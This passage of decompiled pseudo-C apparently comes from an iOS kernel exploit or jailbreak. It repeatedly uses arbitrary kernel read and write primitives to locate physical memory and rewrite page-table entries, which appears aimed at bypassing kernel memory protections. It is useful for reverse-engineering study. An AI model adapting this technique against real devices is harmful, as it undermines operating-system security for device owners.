1739.     *(r31 + 0x640) = r8;
1740.     _constget() + 0x10001e1b8;
1741.     r0 = _WriteAnywhere64();
1742.     r8 = *(r31 + 0x1350) + 0x100;
1743.     *(r31 + 0x638) = r0;
1744.     *(r31 + 0x630) = r8 + 0xa0;
1745.     _constget() + 0x10001e1b8;
1746.     r0 = _WriteAnywhere64();
1747.     r8 = *(r31 + 0x1350) + 0x100;
1748.     *(r31 + 0x628) = r0;
1749.     r0 = _WriteAnywhere64();
1750.     r1 = *(r31 + 0x1350) + 0x100;
1751.     *(r31 + 0x620) = r0;
1752.     r0 = _WriteAnywhere64();
1753.     r8 = *(r31 + 0x1350) + 0x100;
1754.     *(r31 + 0x618) = r0;
1755.     *(r31 + 0x610) = r8 + 0x10;
1756.     _constget() + 0x10001e1b8;
1757.     r0 = _WriteAnywhere64();
1758.     r1 = *(r31 + 0x1350) + 0x100;
1759.     *(r31 + 0x608) = r0;
1760.     r0 = _WriteAnywhere64();
1761.     r8 = *(r31 + 0x1350) + 0x100;
1762.     *(r31 + 0x600) = r0;
1763.     *(r31 + 0x5f8) = r8 + 0x28;
1764.     _constget() + 0x10001e1b8;
1765.     *(r31 + 0x5f0) = _WriteAnywhere64();
1766.     *(r31 + 0x1388) = (_findphys_real() - 0x10001e1d0) + 0x10001e1d8;
1767.     *(r31 + 0x1338) = ((_ReadAnywhere64() & 0xfffffffffffff000) - 0x10001e1d0) + 0x10001e1d8;
1768.     r0 = *(r31 + 0x1338);
1769.     r8 = *(r31 + 0x1388) >> 0x19;
1770.     r8 = (r8 & 0x7ff) << 0x3;
1771.     asm { sxtw       x8, w8 };
1772.     *(r31 + 0x1330) = _ReadAnywhere64();
1773.     _parse_block_tte(*(r31 + 0x1330));
1774.     *(r31 + 0x1330) = *(r31 + 0x1330) & 0xffffffffffffffff;
1775.     *(r31 + 0x1330) = *(r31 + 0x1330) & 0xffffffffffffffff;
1776.     if (!CPU_FLAGS & NE) {
1777.             NSLog(@"breaking it up");
1778.             *(r31 + 0x1328) = _physalloc();
1779.             *(r31 + 0x1320) = *(r31 + 0x1330) & 0xfffffffffffff000;
1780.             *(r31 + 0x1330) = *(r31 + 0x1330) | 0x2;
1781.             for (*(r31 + 0x131c) = r31; *(r31 + 0x131c) < 0x800; *(r31 + 0x131c) = *(r31 + 0x131c) + 0x1) {
1782.                     r8 = *(r31 + 0x1330) & 0xfff;
1783.                     r9 = *(r31 + 0x1320);
1784.                     r11 = *(r31 + 0x131c) << 0xe;
1785.                     asm { sxtw       x11, w11 };
1786.                     *(r31 + 0x1330) = r8 | r9 + r11 & 0xfffffffffffff000;
1787.                     r8 = *(r31 + 0x1328);
1788.                     r9 = *(r31 + 0x131c) << 0x3;
1789.                     asm { sxtw       x9, w9 };
1790.                     *(r31 + 0x5e8) = _WriteAnywhere64();
1791.             }
1792.             r8 = *(r31 + 0x1330) & 0xfff;
1793.             *(r31 + 0x5e0) = r8;
1794.             *(r31 + 0x1330) = *(r31 + 0x5e0) | _findphys_real() & 0xfffffffffffff000;
1795.             r0 = *(r31 + 0x1338);
1796.             r8 = (0x10001e1e8 >> 0x19 & 0x7ff) << 0x3;
1797.             asm { sxtw       x8, w8 };
1798.             *(r31 + 0x5d8) = _WriteAnywhere64();
1799.     }
1800.     _parse_block_tte(*(r31 + 0x1330));
1801.     r8 = ((*(r31 + 0x1330) & 0xfffffffffffff000) - 0x10001e1d0) + 0x10001e1d8;
1802.     r9 = (0x10001e1e8 >> 0xe & 0x7ff) << 0x3;
1803.     asm { sxtw       x9, w9 };
1804.     *(r31 + 0x1310) = r8 + r9;
1805.     *(r31 + 0x1308) = _ReadAnywhere64();
1806.     *(r31 + 0x1308) = *(r31 + 0x1308) & 0xffffffffffffffff;
1807.     *(r31 + 0x1308) = *(r31 + 0x1308) & 0xffffffffffffffff;
1808.     *(r31 + 0x5d0) = *(r31 + 0x1308) & 0xfff;
1809.     *(r31 + 0x1308) = *(r31 + 0x5d0) | ((_constget() & 0xffffffffffffc000) + 0x10001e1b8 - 0x10001e1d8) + 0x10001e1d0 & 0xfffffffffffff000;
1810.     r0 = _WriteAnywhere64();
1811.     *(r31 + 0x1304) = r31;
1812.     *(r31 + 0x5c8) = r0;
1813.     while (*(r31 + 0x1304) < 0x800) {
1814.             r8 = *(r31 + 0x1358);
1815.             r10 = *(r31 + 0x1304) << 0x3;
1816.             asm { sxtw       x10, w10 };
1817.             *(r31 + 0x5c0) = r8 + r10;
1818.             _constget() + 0x10001e1b8;
1819.             *(r31 + 0x5b8) = _WriteAnywhere64();
1820.             *(r31 + 0x1304) = *(r31 + 0x1304) + 0x1;
1821.     }
1822.     r8 = zero_extend_64(0x0);
1823.     r9 = *(r31 + 0x1358);
1824.     r10 = *(r31 + 0x1340);
1825.     r11 = r10 + 0x1;
1826.     *(r31 + 0x1340) = r11;
1827.     r0 = _WriteAnywhere64();
1828.     r12 = zero_extend_64(0x1a);
1829.     r8 = *(r31 + 0x1358);
1830.     r9 = *(r31 + 0x1340);
1831.     r10 = r9 + 0x1;
1832.     *(r31 + 0x1340) = r10;
1833.     r8 = r8 + r9 * 0x8;
1834.     *(r31 + 0x5b0) = r0;
1835.     *(r31 + 0x5a8) = r8;
1836.     r0 = _constget();
1837.     r8 = 0x10001e000;
1838.     r8 = r8 + 0x1b8;
1839.     r8 = r8;
1840.     r0 = _WriteAnywhere64();
1841.     r8 = zero_extend_64(0x0);
1842.     r9 = *(r31 + 0x1358);
1843.     r10 = *(r31 + 0x1340);
1844.     r11 = r10 + 0x1;
1845.     *(r31 + 0x1340) = r11;
1846.     r9 = r9 + r10 * 0x8;
1847.     *(r31 + 0x5a0) = r0;
1848.     r0 = _WriteAnywhere64();
1849.     r12 = zero_extend_64(0x1a);
1850.     r8 = *(r31 + 0x1358);
1851.     r9 = *(r31 + 0x1340);
1852.     r10 = r9 + 0x1;
1853.     *(r31 + 0x1340) = r10;
1854.     r8 = r8 + r9 * 0x8;
1855.     *(r31 + 0x598) = r0;
1856.     *(r31 + 0x590) = r8;
1857.     r0 = _constget();
1858.     r8 = 0x10001e000;
1859.     r8 = r8 + 0x1b8;
1860.     r8 = r8;
1861.     r0 = _WriteAnywhere64();
1862.     r8 = zero_extend_64(0x0);
1863.     r9 = *(r31 + 0x1358);
1864.     r10 = *(r31 + 0x1340);
1865.     r11 = r10 + 0x1;
1866.     *(r31 + 0x1340) = r11;
1867.     r9 = r9 + r10 * 0x8;
1868.     *(r31 + 0x588) = r0;
1869.     r0 = _WriteAnywhere64();
1870.     r12 = zero_extend_64(0x19);
1871.     r8 = *(r31 + 0x1358);
1872.     r9 = *(r31 + 0x1340);
1873.     r10 = r9 + 0x1;
1874.     *(r31 + 0x1340) = r10;
1875.     r8 = r8 + r9 * 0x8;
1876.     *(r31 + 0x580) = r0;
1877.     *(r31 + 0x578) = r8;
1878.     r0 = _constget();
1879.     r8 = 0x10001e000;
1880.     r8 = r8 + 0x1b8;
1881.     r8 = r8;
1882.     r0 = _WriteAnywhere64();
1883.     r8 = zero_extend_64(0x0);
1884.     r9 = *(r31 + 0x1358);
1885.     r10 = *(r31 + 0x1340);
1886.     r11 = r10 + 0x1;
1887.     *(r31 + 0x1340) = r11;
1888.     r9 = r9 + r10 * 0x8;
1889.     *(r31 + 0x570) = r0;
1890.     r0 = _WriteAnywhere64();
1891.     r8 = *(r31 + 0x1358);
1892.     r9 = *(r31 + 0x1340);
1893.     r10 = r9 + 0x1;
1894.     *(r31 + 0x1340) = r10;
1895.     r8 = r8 + r9 * 0x8;
1896.     *(r31 + 0x568) = r0;
1897.     r0 = _WriteAnywhere64();
1898.     r8 = zero_extend_64(0x0);
1899.     r9 = *(r31 + 0x1358);
1900.     r10 = *(r31 + 0x1340);
1901.     r11 = r10 + 0x1;
1902.     *(r31 + 0x1340) = r11;
1903.     r9 = r9 + r10 * 0x8;
1904.     *(r31 + 0x560) = r0;
1905.     r0 = _WriteAnywhere64();
1906.     r12 = zero_extend_64(0x19);
1907.     r8 = *(r31 + 0x1358);
1908.     r9 = *(r31 + 0x1340);
1909.     r10 = r9 + 0x1;
1910.     *(r31 + 0x1340) = r10;
1911.     r8 = r8 + r9 * 0x8;
1912.     *(r31 + 0x558) = r0;
1913.     *(r31 + 0x550) = r8;
1914.     r0 = _constget();
1915.     r8 = 0x10001e000;
1916.     r8 = r8 + 0x1b8;
1917.     r8 = r8;
1918.     r0 = _WriteAnywhere64();
1919.     r8 = zero_extend_64(0x0);
1920.     r9 = *(r31 + 0x1358);
1921.     r10 = *(r31 + 0x1340);
1922.     r11 = r10 + 0x1;
1923.     *(r31 + 0x1340) = r11;
1924.     r9 = r9 + r10 * 0x8;
1925.     *(r31 + 0x548) = r0;
1926.     r0 = _WriteAnywhere64();
1927.     r8 = *(r31 + 0x1358);
1928.     r9 = *(r31 + 0x1340);
1929.     r10 = r9 + 0x1;
1930.     *(r31 + 0x1340) = r10;
1931.     r8 = r8 + r9 * 0x8;
1932.     *(r31 + 0x540) = r0;
1933.     r0 = _WriteAnywhere64();
1934.     r8 = zero_extend_64(0x0);
1935.     r9 = *(r31 + 0x1358);
1936.     r10 = *(r31 + 0x1340);
1937.     r11 = r10 + 0x1;
1938.     *(r31 + 0x1340) = r11;
1939.     r9 = r9 + r10 * 0x8;
1940.     *(r31 + 0x538) = r0;
1941.     r0 = _WriteAnywhere64();
1942.     r12 = zero_extend_64(0x14);
1943.     r8 = *(r31 + 0x1358);
1944.     r9 = *(r31 + 0x1340);
1945.     r10 = r9 + 0x1;
1946.     *(r31 + 0x1340) = r10;
1947.     r8 = r8 + r9 * 0x8;
1948.     *(r31 + 0x530) = r0;
1949.     *(r31 + 0x528) = r8;
1950.     r0 = _constget();
1951.     r8 = 0x10001e000;
1952.     r8 = r8 + 0x1b8;
1953.     r9 = r0 + 0x8;
1954.     r8 = r8;
1955.     r0 = _WriteAnywhere64();
1956.     r8 = zero_extend_64(0x0);
1957.     r9 = *(r31 + 0x1358);
1958.     r10 = *(r31 + 0x1340);
1959.     r11 = r10 + 0x1;
1960.     *(r31 + 0x1340) = r11;
1961.     r9 = r9 + r10 * 0x8;
1962.     *(r31 + 0x520) = r0;
1963.     r0 = _WriteAnywhere64();
1964.     r12 = zero_extend_64(0x19);
1965.     r8 = *(r31 + 0x1358);
1966.     r9 = *(r31 + 0x1340);
1967.     r10 = r9 + 0x1;
1968.     *(r31 + 0x1340) = r10;
1969.     r8 = r8 + r9 * 0x8;
1970.     *(r31 + 0x518) = r0;
1971.     *(r31 + 0x510) = r8;
1972.     r0 = _constget();
1973.     r8 = 0x10001e000;
1974.     r8 = r8 + 0x1b8;
1975.     r8 = r8;
1976.     r0 = _WriteAnywhere64();
1977.     r8 = zero_extend_64(0x0);
1978.     r9 = *(r31 + 0x1358);
1979.     r10 = *(r31 + 0x1340);
1980.     r11 = r10 + 0x1;
1981.     *(r31 + 0x1340) = r11;
1982.     r9 = r9 + r10 * 0x8;
1983.     *(r31 + 0x508) = r0;
1984.     r0 = _WriteAnywhere64();
1985.     r8 = zero_extend_64(0x0);
1986.     r9 = *(r31 + 0x1358);
1987.     r10 = *(r31 + 0x1340);
1988.     r11 = r10 + 0x1;
1989.     *(r31 + 0x1340) = r11;
1990.     r9 = r9 + r10 * 0x8;
1991.     *(r31 + 0x500) = r0;
1992.     r0 = _WriteAnywhere64();
1993.     r8 = zero_extend_64(0x0);
1994.     r9 = *(r31 + 0x1358);
1995.     r10 = *(r31 + 0x1340);
1996.     r11 = r10 + 0x1;
1997.     *(r31 + 0x1340) = r11;
1998.     r9 = r9 + r10 * 0x8;
1999.     *(r31 + 0x4f8) = r0;
2000.     r0 = _WriteAnywhere64();
2001.     r12 = zero_extend_64(0x37);
2002.     r8 = *(r31 + 0x1358);
2003.     r9 = *(r31 + 0x1340);
2004.     r10 = r9 + 0x1;
2005.     *(r31 + 0x1340) = r10;
2006.     r8 = r8 + r9 * 0x8;
2007.     *(r31 + 0x4f0) = r0;
2008.     *(r31 + 0x4e8) = r8;
2009.     r0 = _constget();
2010.     r8 = 0x10001e000;
2011.     r8 = r8 + 0x1b8;
2012.     r8 = r8;
2013.     r0 = _WriteAnywhere64();
2014.     r8 = zero_extend_64(0xbe0);
2015.     r9 = *(r31 + 0x1340);
2016.     *(r31 + 0x12f8) = r9;
2017.     r9 = *(r31 + 0x1358);
2018.     r10 = *(r31 + 0x1340);
2019.     r11 = r10 + 0x1;
2020.     *(r31 + 0x1340) = r11;
2021.     r9 = r9 + r10 * 0x8;
2022.     r10 = *(r31 + 0x12f8);
2023.     r8 = r8 - r10 * 0x8;
2024.     *(r31 + 0x4e0) = r0;
2025.     r0 = _WriteAnywhere64();
2026.     r12 = zero_extend_64(0x35);
2027.     r8 = *(r31 + 0x1358);
2028.     r9 = *(r31 + 0x1340);
2029.     r10 = r9 + 0x1;
2030.     *(r31 + 0x1340) = r10;
2031.     r8 = r8 + r9 * 0x8;
2032.     *(r31 + 0x4d8) = r0;
2033.     *(r31 + 0x4d0) = r8;
2034.     r0 = _constget();
2035.     r8 = 0x10001e000;
2036.     r8 = r8 + 0x1b8;
2037.     r8 = r8;
2038.     r0 = _WriteAnywhere64();
2039.     r8 = zero_extend_64(0x0);
2040.     r9 = *(r31 + 0x1358);
2041.     r10 = *(r31 + 0x1340);
2042.     r11 = r10 + 0x1;
2043.     *(r31 + 0x1340) = r11;
2044.     r9 = r9 + r10 * 0x8;
2045.     *(r31 + 0x4c8) = r0;
2046.     r0 = _WriteAnywhere64();
2047.     r12 = zero_extend_64(0x36);
2048.     r8 = *(r31 + 0x1358);
2049.     r9 = *(r31 + 0x1340);
2050.     r10 = r9 + 0x1;
2051.     *(r31 + 0x1340) = r10;
2052.     r8 = r8 + r9 * 0x8;
2053.     *(r31 + 0x4c0) = r0;
2054.     *(r31 + 0x4b8) = r8;
2055.     r0 = _constget();
2056.     r8 = 0x10001e000;
2057.     r8 = r8 + 0x1b8;
2058.     r8 = r8;
2059.     r0 = _WriteAnywhere64();
2060.     r8 = zero_extend_64(0x0);
2061.     r9 = *(r31 + 0x1358);
2062.     r10 = *(r31 + 0x1340);
2063.     r11 = r10 + 0x1;
2064.     *(r31 + 0x1340) = r11;
2065.     r9 = r9 + r10 * 0x8;
2066.     *(r31 + 0x4b0) = r0;
2067.     r0 = _WriteAnywhere64();
2068.     r12 = zero_extend_64(0x26);
2069.     r8 = *(r31 + 0x1358);
2070.     r9 = *(r31 + 0x1340);
2071.     r10 = r9 + 0x1;
2072.     *(r31 + 0x1340) = r10;
2073.     r8 = r8 + r9 * 0x8;
2074.     *(r31 + 0x4a8) = r0;
2075.     *(r31 + 0x4a0) = r8;
2076.     r0 = _constget();
2077.     r8 = 0x10001e000;
2078.     r8 = r8 + 0x1b8;
2079.     r8 = r8;
2080.     r0 = _WriteAnywhere64();
2081.     r8 = zero_extend_64(0x0);
2082.     r9 = *(r31 + 0x1358);
2083.     r10 = *(r31 + 0x1340);
2084.     r11 = r10 + 0x1;
2085.     *(r31 + 0x1340) = r11;
2086.     r9 = r9 + r10 * 0x8;
2087.     *(r31 + 0x498) = r0;
2088.     r0 = _WriteAnywhere64();
2089.     r12 = zero_extend_64(0x34);
2090.     r8 = *(r31 + 0x1358);
2091.     r9 = *(r31 + 0x1340);
2092.     r10 = r9 + 0x1;
2093.     *(r31 + 0x1340) = r10;
2094.     r8 = r8 + r9 * 0x8;
2095.     *(r31 + 0x490) = r0;
2096.     *(r31 + 0x488) = r8;
2097.     r0 = _constget();
2098.     r8 = 0x10001e000;
2099.     r8 = r8 + 0x1b8;
2100.     r8 = r8;
2101.     r0 = _WriteAnywhere64();
2102.     asm { movn       x8, #0xf };
2103.     asm { movk       x8, #0x638 };
2104.     asm { movk       x8, #0x6468 };
2105.     r9 = 0x10001e000;
2106.     r9 = r9 + 0x1b8;
2107.     r10 = *(r31 + 0x1358);
2108.     r11 = *(r31 + 0x1340);
2109.     r1 = r11 + 0x1;
2110.     *(r31 + 0x1340) = r1;
2111.     r10 = r10 + r11 * 0x8;
2112.     r9 = r9;
2113.     r8 = r9 + r8;
2114.     *(r31 + 0x480) = r0;
2115.     r0 = _WriteAnywhere64();
2116.     r12 = r31 | 0x38;
2117.     r8 = *(r31 + 0x1358);
2118.     r9 = *(r31 + 0x1340);
2119.     r10 = r9 + 0x1;
2120.     *(r31 + 0x1340) = r10;
2121.     r8 = r8 + r9 * 0x8;
2122.     *(r31 + 0x478) = r0;
2123.     *(r31 + 0x470) = r8;
2124.     r0 = _constget();
2125.     r8 = 0x10001e000;
2126.     r8 = r8 + 0x1b8;
2127.     r8 = r8;
2128.     r0 = _WriteAnywhere64();
2129.     r8 = zero_extend_64(0x0);
2130.     r9 = *(r31 + 0x1358);
2131.     r10 = *(r31 + 0x1340);
2132.     r11 = r10 + 0x1;
2133.     *(r31 + 0x1340) = r11;
2134.     r9 = r9 + r10 * 0x8;
2135.     *(r31 + 0x468) = r0;
2136.     r0 = _WriteAnywhere64();
2137.     asm { movn       x8, #0xf };
2138.     asm { movk       x8, #0x70c };
2139.     asm { movk       x8, #0x42e0 };
2140.     r9 = 0x10001e000;
2141.     r9 = r9 + 0x1b8;
2142.     r10 = *(r31 + 0x1358);
2143.     r11 = *(r31 + 0x1340);
2144.     r1 = r11 + 0x1;
2145.     *(r31 + 0x1340) = r1;
2146.     r10 = r10 + r11 * 0x8;
2147.     r9 = r9;
2148.     *(r31 + 0x460) = r0;
2149.     r0 = _WriteAnywhere64();
2150.     r8 = zero_extend_64(0x0);
2151.     r9 = *(r31 + 0x1358);
2152.     r10 = *(r31 + 0x1340);
2153.     r11 = r10 + 0x1;
2154.     *(r31 + 0x1340) = r11;
2155.     r9 = r9 + r10 * 0x8;
2156.     *(r31 + 0x458) = r0;
2157.     r0 = _WriteAnywhere64();
2158.     asm { movn       x8, #0xf };
2159.     asm { movk       x8, #0x74a };
2160.     asm { movk       x8, #0xd890 };
2161.     r9 = 0x10001e000;
2162.     r9 = r9 + 0x1b8;
2163.     r10 = *(r31 + 0x1358);
2164.     r11 = *(r31 + 0x1340);
2165.     r1 = r11 + 0x1;
2166.     *(r31 + 0x1340) = r1;
2167.     r10 = r10 + r11 * 0x8;
2168.     r9 = r9;
2169.     *(r31 + 0x450) = r0;
2170.     r0 = _WriteAnywhere64();
2171.     r8 = zero_extend_64(0x0);
2172.     r9 = *(r31 + 0x1358);
2173.     r10 = *(r31 + 0x1340);
2174.     r11 = r10 + 0x1;
2175.     *(r31 + 0x1340) = r11;
2176.     r9 = r9 + r10 * 0x8;
2177.     *(r31 + 0x448) = r0;
2178.     r0 = _WriteAnywhere64();
2179.     r12 = zero_extend_64(0x1a);
2180.     r8 = *(r31 + 0x1358);
2181.     r9 = *(r31 + 0x1340);
2182.     r10 = r9 + 0x1;
2183.     *(r31 + 0x1340) = r10;
2184.     r8 = r8 + r9 * 0x8;
2185.     *(r31 + 0x440) = r0;
2186.     *(r31 + 0x438) = r8;
2187.     r0 = _constget();
2188.     r8 = 0x10001e000;
2189.     r8 = r8 + 0x1b8;
2190.     r8 = r8;
2191.     r0 = _WriteAnywhere64();
2192.     r8 = zero_extend_64(0x0);
2193.     r9 = *(r31 + 0x1358);
2194.     r10 = *(r31 + 0x1340);
2195.     r11 = r10 + 0x1;
2196.     *(r31 + 0x1340) = r11;
2197.     r9 = r9 + r10 * 0x8;
2198.     *(r31 + 0x430) = r0;
2199.     r0 = _WriteAnywhere64();
2200.     r12 = zero_extend_64(0x1a);
2201.     r8 = *(r31 + 0x1358);
2202.     r9 = *(r31 + 0x1340);
2203.     r10 = r9 + 0x1;
2204.     *(r31 + 0x1340) = r10;
2205.     r8 = r8 + r9 * 0x8;
2206.     *(r31 + 0x428) = r0;
2207.     *(r31 + 0x420) = r8;
2208.     r0 = _constget();
2209.     r8 = 0x10001e000;
2210.     r8 = r8 + 0x1b8;
2211.     r8 = r8;
2212.     r0 = _WriteAnywhere64();
2213.     r8 = zero_extend_64(0x0);
2214.     r9 = *(r31 + 0x1358);
2215.     r10 = *(r31 + 0x1340);
2216.     r11 = r10 + 0x1;
2217.     *(r31 + 0x1340) = r11;
2218.     r9 = r9 + r10 * 0x8;
2219.     *(r31 + 0x418) = r0;
2220.     r0 = _WriteAnywhere64();
2221.     r12 = zero_extend_64(0x1a);
2222.     r8 = *(r31 + 0x1358);
2223.     r9 = *(r31 + 0x1340);
2224.     r10 = r9 + 0x1;
2225.     *(r31 + 0x1340) = r10;
2226.     r8 = r8 + r9 * 0x8;
2227.     *(r31 + 0x410) = r0;
2228.     *(r31 + 0x408) = r8;
2229.     r0 = _constget();
2230.     r8 = 0x10001e000;
2231.     r8 = r8 + 0x1b8;
2232.     r8 = r8;
2233.     r0 = _WriteAnywhere64();
2234.     r8 = zero_extend_64(0x0);
2235.     r9 = *(r31 + 0x1358);
2236.     r10 = *(r31 + 0x1340);
2237.     r11 = r10 + 0x1;
2238.     *(r31 + 0x1340) = r11;
2239.     r9 = r9 + r10 * 0x8;
2240.     *(r31 + 0x400) = r0;
2241.     r0 = _WriteAnywhere64();
2242.     r12 = zero_extend_64(0x1a);
2243.     r8 = *(r31 + 0x1358);
2244.     r9 = *(r31 + 0x1340);
2245.     r10 = r9 + 0x1;
2246.     *(r31 + 0x1340) = r10;
2247.     r8 = r8 + r9 * 0x8;
2248.     *(r31 + 0x3f8) = r0;
2249.     *(r31 + 0x3f0) = r8;
2250.     r0 = _constget();
2251.     r8 = 0x10001e000;
2252.     r8 = r8 + 0x1b8;
2253.     r8 = r8;
2254.     r0 = _WriteAnywhere64();
2255.     r8 = zero_extend_64(0x0);
2256.     r9 = *(r31 + 0x1358);
2257.     r10 = *(r31 + 0x1340);
2258.     r11 = r10 + 0x1;
2259.     *(r31 + 0x1340) = r11;
2260.     r9 = r9 + r10 * 0x8;
2261.     *(r31 + 0x3e8) = r0;
2262.     r0 = _WriteAnywhere64();
2263.     r12 = zero_extend_64(0x1a);
2264.     r8 = *(r31 + 0x1358);
2265.     r9 = *(r31 + 0x1340);
2266.     r10 = r9 + 0x1;
2267.     *(r31 + 0x1340) = r10;
2268.     r8 = r8 + r9 * 0x8;
2269.     *(r31 + 0x3e0) = r0;
2270.     *(r31 + 0x3d8) = r8;
2271.     r0 = _constget();
2272.     r8 = 0x10001e000;
2273.     r8 = r8 + 0x1b8;
2274.     r8 = r8;
2275.     r0 = _WriteAnywhere64();
2276.     r8 = zero_extend_64(0x0);
2277.     r9 = *(r31 + 0x1358);
2278.     r10 = *(r31 + 0x1340);
2279.     r11 = r10 + 0x1;
2280.     *(r31 + 0x1340) = r11;
2281.     r9 = r9 + r10 * 0x8;
2282.     *(r31 + 0x3d0) = r0;
2283.     r0 = _WriteAnywhere64();
2284.     r12 = zero_extend_64(0x1a);
2285.     r8 = *(r31 + 0x1358);
2286.     r9 = *(r31 + 0x1340);
2287.     r10 = r9 + 0x1;
2288.     *(r31 + 0x1340) = r10;
2289.     r8 = r8 + r9 * 0x8;
2290.     *(r31 + 0x3c8) = r0;
2291.     *(r31 + 0x3c0) = r8;
2292.     r0 = _constget();
2293.     r8 = 0x10001e000;
2294.     r8 = r8 + 0x1b8;
2295.     r8 = r8;
2296.     r0 = _WriteAnywhere64();
2297.     r8 = zero_extend_64(0x0);
2298.     r9 = *(r31 + 0x1358);
2299.     r10 = *(r31 + 0x1340);
2300.     r11 = r10 + 0x1;
2301.     *(r31 + 0x1340) = r11;
2302.     r9 = r9 + r10 * 0x8;
2303.     *(r31 + 0x3b8) = r0;
2304.     r0 = _WriteAnywhere64();
2305.     r12 = zero_extend_64(0x1a);
2306.     r8 = *(r31 + 0x1358);
2307.     r9 = *(r31 + 0x1340);
2308.     r10 = r9 + 0x1;
2309.     *(r31 + 0x1340) = r10;
2310.     r8 = r8 + r9 * 0x8;
2311.     *(r31 + 0x3b0) = r0;
2312.     *(r31 + 0x3a8) = r8;
2313.     r0 = _constget();
2314.     r8 = 0x10001e000;
2315.     r8 = r8 + 0x1b8;
2316.     r8 = r8;
2317.     r0 = _WriteAnywhere64();
2318.     r8 = zero_extend_64(0x0);
2319.     r9 = *(r31 + 0x1358);
2320.     r10 = *(r31 + 0x1340);
2321.     r11 = r10 + 0x1;
2322.     *(r31 + 0x1340) = r11;
2323.     r9 = r9 + r10 * 0x8;
2324.     *(r31 + 0x3a0) = r0;
2325.     r0 = _WriteAnywhere64();
2326.     r12 = zero_extend_64(0x1a);
2327.     r8 = *(r31 + 0x1358);
2328.     r9 = *(r31 + 0x1340);
2329.     r10 = r9 + 0x1;
2330.     *(r31 + 0x1340) = r10;
2331.     r8 = r8 + r9 * 0x8;
2332.     *(r31 + 0x398) = r0;
2333.     *(r31 + 0x390) = r8;
2334.     r0 = _constget();
2335.     r8 = 0x10001e000;
2336.     r8 = r8 + 0x1b8;
2337.     r8 = r8;
2338.     r0 = _WriteAnywhere64();
2339.     r8 = zero_extend_64(0x0);
2340.     r9 = *(r31 + 0x1358);
2341.     r10 = *(r31 + 0x1340);
2342.     r11 = r10 + 0x1;
2343.     *(r31 + 0x1340) = r11;
2344.     r9 = r9 + r10 * 0x8;
2345.     *(r31 + 0x388) = r0;
2346.     r0 = _WriteAnywhere64();
2347.     r12 = zero_extend_64(0x1a);
2348.     r8 = *(r31 + 0x1358);
2349.     r9 = *(r31 + 0x1340);
2350.     r10 = r9 + 0x1;
2351.     *(r31 + 0x1340) = r10;
2352.     r8 = r8 + r9 * 0x8;
2353.     *(r31 + 0x380) = r0;
2354.     *(r31 + 0x378) = r8;
2355.     r0 = _constget();
2356.     r8 = 0x10001e000;
2357.     r8 = r8 + 0x1b8;
2358.     r8 = r8;
2359.     r0 = _WriteAnywhere64();
2360.     r8 = zero_extend_64(0x0);
2361.     r9 = *(r31 + 0x1358);
2362.     r10 = *(r31 + 0x1340);
2363.     r11 = r10 + 0x1;
2364.     *(r31 + 0x1340) = r11;
2365.     r9 = r9 + r10 * 0x8;
2366.     *(r31 + 0x370) = r0;
2367.     r0 = _WriteAnywhere64();
2368.     r12 = zero_extend_64(0x1a);
2369.     r8 = *(r31 + 0x1358);
2370.     r9 = *(r31 + 0x1340);
2371.     r10 = r9 + 0x1;
2372.     *(r31 + 0x1340) = r10;
2373.     r8 = r8 + r9 * 0x8;
2374.     *(r31 + 0x368) = r0;
2375.     *(r31 + 0x360) = r8;
2376.     r0 = _constget();
2377.     r8 = 0x10001e000;
2378.     r8 = r8 + 0x1b8;
2379.     r8 = r8;
2380.     r0 = _WriteAnywhere64();
2381.     r8 = zero_extend_64(0x0);
2382.     r9 = *(r31 + 0x1358);
2383.     r10 = *(r31 + 0x1340);
2384.     r11 = r10 + 0x1;
2385.     *(r31 + 0x1340) = r11;
2386.     r9 = r9 + r10 * 0x8;
2387.     *(r31 + 0x358) = r0;
2388.     r0 = _WriteAnywhere64();
2389.     r12 = zero_extend_64(0x1a);
2390.     r8 = *(r31 + 0x1358);
2391.     r9 = *(r31 + 0x1340);
2392.     r10 = r9 + 0x1;
2393.     *(r31 + 0x1340) = r10;
2394.     r8 = r8 + r9 * 0x8;
2395.     *(r31 + 0x350) = r0;
2396.     *(r31 + 0x348) = r8;
2397.     r0 = _constget();
2398.     r8 = 0x10001e000;
2399.     r8 = r8 + 0x1b8;
2400.     r8 = r8;
2401.     r0 = _WriteAnywhere64();
2402.     r8 = zero_extend_64(0x0);
2403.     r9 = *(r31 + 0x1358);
2404.     r10 = *(r31 + 0x1340);
2405.     r11 = r10 + 0x1;
2406.     *(r31 + 0x1340) = r11;
2407.     r9 = r9 + r10 * 0x8;
2408.     *(r31 + 0x340) = r0;
2409.     r0 = _WriteAnywhere64();
2410.     r12 = zero_extend_64(0x1a);
2411.     r8 = *(r31 + 0x1358);
2412.     r9 = *(r31 + 0x1340);
2413.     r10 = r9 + 0x1;
2414.     *(r31 + 0x1340) = r10;
2415.     r8 = r8 + r9 * 0x8;
2416.     *(r31 + 0x338) = r0;
2417.     *(r31 + 0x330) = r8;
2418.     r0 = _constget();
2419.     r8 = 0x10001e000;
2420.     r8 = r8 + 0x1b8;
2421.     r8 = r8;
2422.     r0 = _WriteAnywhere64();
2423.     r8 = zero_extend_64(0x0);
2424.     r9 = *(r31 + 0x1358);
2425.     r10 = *(r31 + 0x1340);
2426.     r11 = r10 + 0x1;
2427.     *(r31 + 0x1340) = r11;
2428.     r9 = r9 + r10 * 0x8;
2429.     *(r31 + 0x328) = r0;
2430.     r0 = _WriteAnywhere64();
2431.     r12 = zero_extend_64(0x19);
2432.     r8 = *(r31 + 0x1358);
2433.     r9 = *(r31 + 0x1340);
2434.     r10 = r9 + 0x1;
2435.     *(r31 + 0x1340) = r10;
2436.     r8 = r8 + r9 * 0x8;
2437.     *(r31 + 0x320) = r0;
2438.     *(r31 + 0x318) = r8;
2439.     r0 = _constget();
2440.     r8 = 0x10001e000;
2441.     r8 = r8 + 0x1b8;
2442.     r8 = r8;
2443.     r0 = _WriteAnywhere64();
2444.     r8 = zero_extend_64(0x0);
2445.     r9 = *(r31 + 0x1358);
2446.     r10 = *(r31 + 0x1340);
2447.     r11 = r10 + 0x1;
2448.     *(r31 + 0x1340) = r11;
2449.     r9 = r9 + r10 * 0x8;
2450.     *(r31 + 0x310) = r0;
2451.     r0 = _WriteAnywhere64();
2452.     r8 = *(r31 + 0x1358);
2453.     r9 = *(r31 + 0x1340);
2454.     r10 = r9 + 0x1;
2455.     *(r31 + 0x1340) = r10;
2456.     r8 = r8 + r9 * 0x8;
2457.     *(r31 + 0x308) = r0;
2458.     r0 = _WriteAnywhere64();
2459.     r8 = zero_extend_64(0x0);
2460.     r9 = *(r31 + 0x1358);
2461.     r10 = *(r31 + 0x1340);
2462.     r11 = r10 + 0x1;
